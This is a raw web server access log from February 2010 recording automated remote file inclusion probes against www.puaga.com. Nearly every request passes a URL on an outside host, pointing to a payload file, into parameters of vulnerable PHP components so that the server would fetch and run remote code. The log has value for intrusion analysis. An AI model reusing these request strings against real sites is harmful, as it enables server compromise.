24.207.120.69 - - [15/Feb/2010:08:31:21 -0800] "GET /logs/access_100208.log/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:31:22 -0800] "GET /errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:31:39 -0800] "GET /logs/access_100210.log/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:31:39 -0800] "GET /errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:32:17 -0800] "GET /logs/access_100111.log%20%20///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:32:31 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:32:31 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:32:31 -0800] "GET /logs/access_100202.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:32:52 -0800] "GET /logs/access_100109.log/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:32:53 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:32:53 -0800] "GET /logs/access_100210.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:32:53 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:33:02 -0800] "GET /logs/access_100201.log//games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:33:09 -0800] "GET /logs/access_100201.log//games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:33:28 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:33:28 -0800] "GET /logs/access_100210.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:33:28 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:34:17 -0800] "GET /logs/access_100128.log%20%20//write_update.head.skin.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:36:52 -0800] "GET /admin.php?vwar_root=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:37:07 -0800] "GET /logs/access_100116.log//admin.php?vwar_root=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:37:07 -0800] "GET /logs//admin.php?vwar_root=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:37:58 -0800] "GET /logs/access_100114.log%20%20//mygallerybrowser.php?myPath=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:37:59 -0800] "GET /logs/access_100208.log%20%20//mygallerybrowser.php?myPath=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:37:59 -0800] "GET /logs//mygallerybrowser.php?myPath=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:37:59 -0800] "GET /mygallerybrowser.php?myPath=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:38:02 -0800] "GET /logs/access_100206.log//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:38:36 -0800] "GET /logs/access_100202.log//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:38:54 -0800] "GET /logs/access_100202.log%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:38:54 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:38:54 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:08:39:15 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:08:39:15 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:08:40:32 -0800] "GET /logs/access_100104.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:08:40:34 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:08:40:35 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:40:45 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:40:45 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:40:45 -0800] "GET /logs/access_100130.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:08:40:55 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:41:09 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:41:41 -0800] "GET /logs/access_100121.log//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:43:27 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:43:52 -0800] "GET /logs/access_100121.log//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.108.220.89 - - [15/Feb/2010:08:44:03 -0800] "GET / HTTP/1.1" 200 13955 "http://www.yandex.ru/yandsearch?text=%e4%ee%f1%f3%e3.%ed%f3&stype=www" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; InfoPath.1; .NET CLR 1.1.4322)" "atesh.info"
95.108.220.89 - - [15/Feb/2010:08:44:04 -0800] "GET /atesh_info/links.js HTTP/1.1" 200 43 "http://www.yandex.ru/yandsearch?text=%e4%ee%f1%f3%e3.%ed%f3&stype=www" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; InfoPath.1; .NET CLR 1.1.4322)" "atesh.info"
95.108.220.89 - - [15/Feb/2010:08:44:04 -0800] "GET /atesh_info/ai.css HTTP/1.1" 200 487 "http://atesh.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; InfoPath.1; .NET CLR 1.1.4322)" "atesh.info"
213.251.189.201 - - [15/Feb/2010:08:44:13 -0800] "GET /site/bbs///////delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:44:13 -0800] "GET /logs//site/bbs///////delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:44:13 -0800] "GET /logs/access_100202.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:44:15 -0800] "GET /logs/access_100205.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.249.103.31 - - [15/Feb/2010:08:45:56 -0800] "GET /logs/access_100203.log%20%20//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:46:50 -0800] "GET /logs/access_100202.log%20%20//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:46:50 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:46:50 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:47:10 -0800] "GET /logs/access_100128.log%20%20//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:48:20 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://kopi123.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:48:20 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://kopi123.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:48:20 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://kopi123.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:48:56 -0800] "GET /logs/access.log%20%20/components/com_forum/download.php?phpbb_root_path=http://kopi123.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:09 -0800] "GET /logs/access_100202.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:09 -0800] "GET /site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:09 -0800] "GET /logs//site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:12 -0800] "GET /logs/access_100205.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:34 -0800] "GET /site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:35 -0800] "GET /logs//site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:35 -0800] "GET /logs/access_100202.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:51:36 -0800] "GET /logs/access_100205.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:53:40 -0800] "GET /site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:53:40 -0800] "GET /logs//site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:53:40 -0800] "GET /logs/access_100202.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:53:56 -0800] "GET /logs/access_100128.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:54:30 -0800] "GET /site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:54:30 -0800] "GET /logs//site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:54:30 -0800] "GET /logs/access_100202.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:08:54:51 -0800] "GET /logs/access_100128.log%20%20//site/bbs///////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:55:12 -0800] "GET /logs/access_100116.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:55:13 -0800] "GET /logs/access_100206.log//site/bbs///////delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:55:27 -0800] "GET /logs/access_100202.log//site/bbs///////delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:08:56:43 -0800] "GET /logs/access_100114.log/modules/Neos_Chronos/header.php?base_folder=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:08:56:43 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:08:56:44 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:08:57:58 -0800] "GET /bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:08:57:58 -0800] "GET /logs/access_100207.log%20%20//bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:08:57:58 -0800] "GET /logs//bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:15 -0800] "GET /logs/access_100131.log//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:15 -0800] "GET /logs//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:15 -0800] "GET /logs//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:16 -0800] "GET /index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:17 -0800] "GET /logs/access_100131.log//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:17 -0800] "GET /logs//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:18 -0800] "GET /index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:20 -0800] "GET /logs/access_100125.log//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:21 -0800] "GET /logs/access_100125.log//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:58:22 -0800] "GET /logs/access_100116.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:22 -0800] "GET /logs/access_100125.log//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:38 -0800] "GET /logs/access_100131.log//index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.136.61.19 - - [15/Feb/2010:08:58:43 -0800] "GET /index.php?option=com_serverstat&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:08:58:50 -0800] "GET /logs/access_100130.log%20%20/delete.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:08:58:50 -0800] "GET /logs/delete.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:08:58:50 -0800] "GET /delete.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:59:21 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:59:21 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:59:21 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:59:57 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:09:00:31 -0800] "GET /logs/access_100206.log//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:09:00:42 -0800] "GET /logs/access_100206.log//site/bbs///////delete_comment.php?board_skin_path=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:09:00:48 -0800] "GET /logs/access_100210.log%20%20//bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:09:01:09 -0800] "GET /logs/access_100202.log//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:02:00 -0800] "GET /logs/access_100112.log//modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:02:02 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:09:02:03 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.78.109.87 - - [15/Feb/2010:09:02:17 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [15/Feb/2010:09:02:17 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [15/Feb/2010:09:02:18 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [15/Feb/2010:09:02:25 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
